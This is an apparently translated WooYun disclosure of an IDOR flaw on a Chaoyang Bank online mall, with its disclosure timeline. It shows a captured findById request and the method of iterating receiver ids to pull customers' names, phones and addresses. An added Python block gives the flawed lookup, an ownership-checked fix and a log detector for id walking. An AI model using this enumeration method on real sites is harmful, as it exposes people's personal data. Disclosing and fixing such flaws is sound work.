WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2016-01-26: Details reported to the vendor; awaiting vendor handling
2016-01-29: Vendor has confirmed; details disclosed to the vendor only
2016-02-08: Details disclosed to core white hats and experts in related fields
2016-02-18: Details disclosed to ordinary white hats
2016-02-28: Details disclosed to intern white hats
2016-03-14: Details disclosed to the public
Horizontal privilege escalation (IDOR) on a Chaoyang Bank site (19k users' names / postcodes / phone numbers / addresses)
Horizontal privilege escalation on the main site of Chaoyang Bank's online shopping mall
http://**.**.**.**/
While shopping, add a delivery address and capture the request:

POST /member/receiver/findById.jhtml HTTP/1.1
Host: **.**.**.**
Content-Length: 8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
token: 7d62e825-e1dc-47d9-a396-8866f8fadea7
Referer: http://**.**.**.**/member/order/info.jhtml?cartKey=8a67f1d1-11d1-4217-a14c-5cc302428a6e547dc6329597654fe5808d87acd301c8&receiverId=19727
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: id=19725
We iterate over the ids 19111 to 19222.
Exporting the results and taking a look:
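The server-side ownership check that findById.jhtml lacks, next to the flawed lookup, plus a cheap detection for the sequential-id walking shown above. This is an added example, not code from the original report or the bank's site; the record store, function names and the access-log format are assumed.

```python
import re
from collections import defaultdict

# Constructed sample store (assumed layout): receiver id -> (owning member, address)
RECEIVERS = {
    19725: ("member-A", "address of A"),
    19726: ("member-B", "address of B"),
    19727: ("member-A", "second address of A"),
}

def find_by_id_vulnerable(receiver_id: int, session_member: str):
    """Mirrors the reported flaw: the record is fetched by the client-supplied
    id alone, so any logged-in member can read any other member's address."""
    rec = RECEIVERS.get(receiver_id)
    return rec[1] if rec else None

def find_by_id_fixed(receiver_id: int, session_member: str):
    """Fix: scope the lookup to the authenticated member. A missing record and
    another member's record get the same answer, so the response does not
    reveal which ids exist."""
    rec = RECEIVERS.get(receiver_id)
    if rec is None or rec[0] != session_member:
        return None
    return rec[1]

# Constructed access-log lines (assumed format): method path token id
SAMPLE_LOG = """\
POST /member/receiver/findById.jhtml token=T1 id=19725
POST /member/receiver/findById.jhtml token=T1 id=19727
POST /member/receiver/findById.jhtml token=T2 id=19111
POST /member/receiver/findById.jhtml token=T2 id=19112
POST /member/receiver/findById.jhtml token=T2 id=19113
POST /member/receiver/findById.jhtml token=T2 id=19114
"""
LINE_RE = re.compile(r"findById\.jhtml token=(\S+) id=(\d+)")

def flag_id_walking(log_text: str, max_distinct_ids: int = 3):
    """Return session tokens that requested more distinct receiver ids than a
    member would plausibly own: a simple signal for sequential-id enumeration."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(t for t, ids in seen.items() if len(ids) > max_distinct_ids)
```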
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2016-01-29 16:30
CNVD could not reproduce the described situation; the report has been forwarded via CNCERT to the competent authority for banking-sector informatization, which will coordinate follow-up handling with the website's operating unit.
None yet